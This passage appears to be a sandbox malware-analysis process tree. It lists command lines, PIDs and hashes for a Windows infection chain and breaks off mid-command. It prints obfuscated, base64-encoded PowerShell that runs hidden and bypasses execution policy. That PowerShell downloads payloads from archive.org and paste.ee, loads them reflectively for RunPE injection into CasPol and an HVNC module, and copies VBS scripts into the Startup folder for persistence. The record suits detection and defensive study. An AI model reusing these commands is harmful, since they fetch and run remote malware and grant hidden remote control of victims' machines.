"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnezB9dX JsID0gezF9 aHR0cHMnKy c6Ly9pYTYw JysnMDEwMC 51cy5hcmNo aScrJ3ZlLm 9yZycrJy8y NC9pJysndG VtcycrJy9k JysnZXQnKy dhJysnaC1u b3RlLXYvRG V0YWgnKydO b3RlVicrJy 50eHR7MX07 ezAnKyd9Ym FzZTY0Q28n KydudGVudC AnKyc9Jysn ICcrJyhOZX ctT2InKydq ZWN0IFN5Jy snc3QnKydl bS5OZScrJ3 QuVycrJ2Vi Q2xpZScrJ2 50KS4nKydE b3dubCcrJ2 9hZFN0Jysn cmluJysnZy h7MCcrJ30n Kyd1cmwpO3 snKycwfWJp bicrJ2FyJy sneUNvbicr J3RlbicrJ3 QgPScrJyAn KydbU3lzdG VtLkNvbnZl cnRdJysnOj onKydGcm9t QmEnKydzZT Y0U3RyaW5n KHswfWJhc2 UnKyc2NENv bicrJ3Rlbn QpO3swfWFz c2UnKydtYm wnKyd5ICcr Jz0nKycgW1 JlZmxlY3Rp b24uQXMnKy dzJysnZW1i bHldOjonKy dMbycrJ2Fk KHswfWJpbm EnKydyeUNv bnRlbnQpO3 swfXR5cCcr J2UgJysnPS B7JysnMH0n Kydhc3NlbS crJ2JseS5H ZXRUJysneX AnKydlKHsx fVInKyd1bl BFJysnLkhv JysnbWV7Jy snMX0pO3sw JysnfScrJ2 1lJysndGhv ZCA9IHswfX R5cGUuR2V0 TWV0aG9kKH sxfVZBJysn SXsxfScrJy k7ezB9Jysn bScrJ2UnKy d0aCcrJ29k LkluJysndi crJ29rZSh7 MH1udScrJ2 xsLCBbb2Jq ZScrJ2N0Wy crJ11dJysn QCh7MX0nKy cwJysnL2dK MWsnKydTJy snL2QvJysn ZWUuZScrJ3 RzYXAvLzpz cHR0aHsxJy snfScrJyAs JysnIHsxfW RlJysnc2F0 JysnaXZhZG 97MScrJ30n KycgLCB7MS crJ31kZXNh dGl2YScrJ2 QnKydvezF9 ICwgezF9Jy snZGUnKydz YXRpdmFkb3 snKycxfSx7 MX1DJysnYS crJ3NQbycr J2x7MX0nKy csezEnKyd9 eycrJzF9KS knKS1mICBb Y2hBUl0zNi xbY2hBUl0z OSkgfElleA ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8408 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5124 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('{0 }url = {1} https'+':/ /ia60'+'01 00.us.arch i'+'ve.org '+'/24/i'+ 'tems'+'/d '+'et'+'a' +'h-note-v /Detah'+'N oteV'+'.tx t{1};{0'+' }base64Co' +'ntent '+ '='+' '+'( New-Ob'+'j ect Sy'+'s t'+'em.Ne' +'t.W'+'eb Clie'+'nt) .'+'Downl' +'oadSt'+' rin'+'g({0 '+'}'+'url );{'+'0}bi n'+'ar'+'y Con'+'ten' +'t ='+' ' +'[System. Convert]'+ '::'+'From Ba'+'se64S tring({0}b ase'+'64Co n'+'tent); {0}asse'+' mbl'+'y '+ '='+' [Ref lection.As '+'s'+'emb ly]::'+'Lo '+'ad({0}b ina'+'ryCo ntent);{0} typ'+'e '+ '= {'+'0}' +'assem'+' bly.GetT'+ 'yp'+'e({1 }R'+'unPE' +'.Ho'+'me {'+'1});{0 '+'}'+'me' +'thod = { 0}type.Get Method({1} VA'+'I{1}' +');{0}'+' m'+'e'+'th '+'od.In'+ 'v'+'oke({ 0}nu'+'ll, [obje'+'c t['+']]'+' @({1}'+'0' +'/gJ1k'+' S'+'/d/'+' ee.e'+'tsa p//:sptth{ 1'+'}'+' , '+' {1}de' +'sat'+'iv ado{1'+'}' +' , {1'+' }desativa' +'d'+'o{1} , {1}'+'d e'+'sativa do{'+'1},{ 1}C'+'a'+' sPo'+'l{1} '+',{1'+'} {'+'1}))') -f [chAR]3 6,[chAR]39 ) |Iex" MD5: 04029E121A0CFA5991749937DD22A1D9) - CasPol.exe (PID: 8400 cmdline:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - cmd.exe (PID: 8740 cmdline:
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8748 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 8820 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 8912 cmdline:
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8920 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 8964 cmdline:
ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 8576 cmdline:
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 704 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnezB9dX JsID0gezF9 aHR0cHMnKy c6Ly9pYTYw JysnMDEwMC 51cy5hcmNo aScrJ3ZlLm 9yZycrJy8y NC9pJysndG VtcycrJy9k JysnZXQnKy dhJysnaC1u b3RlLXYvRG V0YWgnKydO b3RlVicrJy 50eHR7MX07 ezAnKyd9Ym FzZTY0Q28n KydudGVudC AnKyc9Jysn ICcrJyhOZX ctT2InKydq ZWN0IFN5Jy snc3QnKydl bS5OZScrJ3 QuVycrJ2Vi Q2xpZScrJ2 50KS4nKydE b3dubCcrJ2 9hZFN0Jysn cmluJysnZy h7MCcrJ30n Kyd1cmwpO3 snKycwfWJp bicrJ2FyJy sneUNvbicr J3RlbicrJ3 QgPScrJyAn KydbU3lzdG VtLkNvbnZl cnRdJysnOj onKydGcm9t QmEnKydzZT Y0U3RyaW5n KHswfWJhc2 UnKyc2NENv bicrJ3Rlbn QpO3swfWFz c2UnKydtYm wnKyd5ICcr Jz0nKycgW1 JlZmxlY3Rp b24uQXMnKy dzJysnZW1i bHldOjonKy dMbycrJ2Fk KHswfWJpbm EnKydyeUNv bnRlbnQpO3 swfXR5cCcr J2UgJysnPS B7JysnMH0n Kydhc3NlbS crJ2JseS5H ZXRUJysneX AnKydlKHsx fVInKyd1bl BFJysnLkhv JysnbWV7Jy snMX0pO3sw JysnfScrJ2 1lJysndGhv ZCA9IHswfX R5cGUuR2V0 TWV0aG9kKH sxfVZBJysn SXsxfScrJy k7ezB9Jysn bScrJ2UnKy d0aCcrJ29k LkluJysndi crJ29rZSh7 MH1udScrJ2 xsLCBbb2Jq ZScrJ2N0Wy crJ11dJysn QCh7MX0nKy cwJysnL2dK MWsnKydTJy snL2QvJysn ZWUuZScrJ3 RzYXAvLzpz cHR0aHsxJy snfScrJyAs JysnIHsxfW RlJysnc2F0 JysnaXZhZG 97MScrJ30n KycgLCB7MS crJ31kZXNh dGl2YScrJ2 QnKydvezF9 ICwgezF9Jy snZGUnKydz YXRpdmFkb3 snKycxfSx7 MX1DJysnYS crJ3NQbycr J2x7MX0nKy csezEnKyd9 eycrJzF9KS knKS1mICBb Y2hBUl0zNi xbY2hBUl0z OSkgfElleA ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6808 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3912 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('{0 }url = {1} https'+':/ /ia60'+'01 00.us.arch i'+'ve.org '+'/24/i'+ 'tems'+'/d '+'et'+'a' +'h-note-v /Detah'+'N oteV'+'.tx t{1};{0'+' }base64Co' +'ntent '+ '='+' '+'( New-Ob'+'j ect Sy'+'s t'+'em.Ne' +'t.W'+'eb Clie'+'nt) .'+'Downl' +'oadSt'+' rin'+'g({0 '+'}'+'url );{'+'0}bi n'+'ar'+'y Con'+'ten' +'t ='+' ' +'[System. Convert]'+ '::'+'From Ba'+'se64S tring({0}b ase'+'64Co n'+'tent); {0}asse'+' mbl'+'y '+ '='+' [Ref lection.As '+'s'+'emb ly]::'+'Lo '+'ad({0}b ina'+'ryCo ntent);{0} typ'+'e '+ '= {'+'0}' +'assem'+' bly.GetT'+ 'yp'+'e({1 }R'+'unPE' +'.Ho'+'me {'+'1});{0 '+'}'+'me' +'thod = { 0}type.Get Method({1} VA'+'I{1}' +');{0}'+' m'+'e'+'th '+'od.In'+ 'v'+'oke({ 0}nu'+'ll, [obje'+'c t['+']]'+' @({1}'+'0' +'/gJ1k'+' S'+'/d/'+' ee.e'+'tsa p//:sptth{ 1'+'}'+' , '+' {1}de' +'sat'+'iv ado{1'+'}' +' , {1'+' }desativa' +'d'+'o{1} , {1}'+'d e'+'sativa do{'+'1},{ 1}C'+'a'+' sPo'+'l{1} '+',{1'+'} {'+'1}))') -f [chAR]3 6,[chAR]39 ) |Iex" MD5: 04029E121A0CFA5991749937DD22A1D9) - CasPol.exe (PID: 8460 cmdline:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - CasPol.exe (PID: 3548 cmdline:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B) - cmd.exe (PID: 9000 cmdline:
"cmd" /C echo %username% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 9012 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 9048 cmdline:
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 9056 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 9116 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 9176 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 9184 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8316 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 4408 cmdline:
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3800 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 8552 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6444 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3936 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8876 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 6852 cmdline:
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6044 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 8796 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 9136 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5072 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8680 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 8744 cmdline:
"cmd" /C echo %username% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8740 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8608 cmdline:
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8580 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 6844 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 9076 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 